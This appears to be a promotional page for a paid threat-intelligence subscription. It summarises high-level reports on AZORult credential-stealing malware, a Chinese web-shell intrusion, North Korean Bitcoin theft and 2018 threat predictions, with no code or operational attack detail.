Cyber threat topics written by top analysts
Intelligence isn’t network data, or indicators of compromise, or forensics. Intelligence isn’t derived by machines, it’s derived by humans analyzing all of that data to provide information security professionals with accurate, contextual information with which they base create workplans, strategy, and allocate money and people.
Get access to all the best cyber intelligence stories. Share them with your managers, or others who might be interested. They’re all based on work our security professionals are doing in the lab. Price $375 Per Year
AZORult is a publicly available information-stealing malware that is popular among hackers. AZORult is delivered via phishing e-mails and with the use of Exploit Kits (EK), most notably the Rig EK. It collects information from victims by targeting a variety of applications for credential harvesting. In January 2018, Wapack Labs started analysis of AZORult nodes in an effort to identify stolen data. As part of this research, Wapack Labs gained insight into AZORult Command and Controls (C2). This report includes details on the AZORult malware and provides trending on the identified infrastructure. Wapack Labs analysts were able to recover over a million AZORult logs, which include data on victim IPs, e-mails, credentials, and attack server data. This information is listed in the Wapack Labs Blacklist Slack channel and searchable via our CTAC tool to provide situational awareness.
Wapack Labs has cataloged and reported on AZORult malware in the past. An archive of related reporting can be found in the Red Sky Alliance portal.
Chinese nation state attackers (high confidence) recently used a Java web shell (Chropper.java), against a corporate network’s external web server, to download an unidentified malware payload. The initial breach against the server occurred on 15 December 2017, likely leveraging a Cold Fusion exploit. On 18 December 2017, attackers deployed a modified version of the web shell. The web shell came from a large collection of popular Chinese web shells uploaded to GitHub by a user who follows well-known Chinese security researchers. On 19 to 21 December 2017, the attack sequence took place, and was detected on the 21st. Once connected, the attackers executed a PowerShell script to execute a payload, which was never written to the disk. It established persistence, and injected into legitimate Windows processes, to enumerate all drive letters from C to Z, to identify all the mapped drives on the server.
Wapack Labs has cataloged and reported on data exfiltration methods in the past. An archive of related reporting can be found in the Red Sky Alliance portal.
North Korea has been identified as conducting multiple thefts of Bitcoin cryptocurrency in 2017. In conjunction with its identification as the actor behind the Wannacry ransomware, which was also an attempt to acquire Bitcoin, plus limited evidence of bitcoin mining, these actions indicate a major North Korean campaign is underway to acquire Bitcoin as a way to raise hard currency. North Korea was likely motivated to acquire Bitcoin, by any means, because of the currency’s rapidly increasing value in 2017, the possibility of hiding the thefts by converting Bitcoin into more obscure forms of cryptocurrency, and the convertibility of Bitcoin and these other cryptocurrencies to hard currency. While it is unusual for a nation-state to be involved in this type of theft, it is not much different from other North Korean criminal enterprises which have included cyber bank robbery, illegal weapons sales, and counterfeiting U.S. currency.
Wapack Labs has cataloged and reported on North Korean cyber activity in the past. An archive of related reporting can be found in the Red Sky Alliance portal.
Wapack Labs has cataloged and reported on APT activity and watering-hole attacks in the past. An archive of related reporting can be found in the Red Sky Alliance portal.
This report encapsulates our predictions regarding the most significant cyber threats and vulnerabilities for 2018.
- Phishing: Will likely become more popular among novice and criminal hackers.
- Account Targeting: Account credentials are increasingly more available.
- Democratization of Cyber Weapons: 2017 saw the most high-profile ransomware attack to-date with the Wannacry worm.
- Tor Network: 2018 is the year of fighting and winning against the abuse of the Tor network.
- Macro Malware: The popularity of malicious macros for malware delivery continued strong in 2017.
- Geopolitical Tensions: Iran and North Korea tensions continue.
- Blockchain-related Cybercrime: With the establishment of Bitcoin futures and general interest to blockchain technologies, exploitation in this field grows too...
Wapack Labs has cataloged and reported on cyber threats and vulnerabilities in the past. An archive of related reporting can be found in the Red Sky Alliance portal.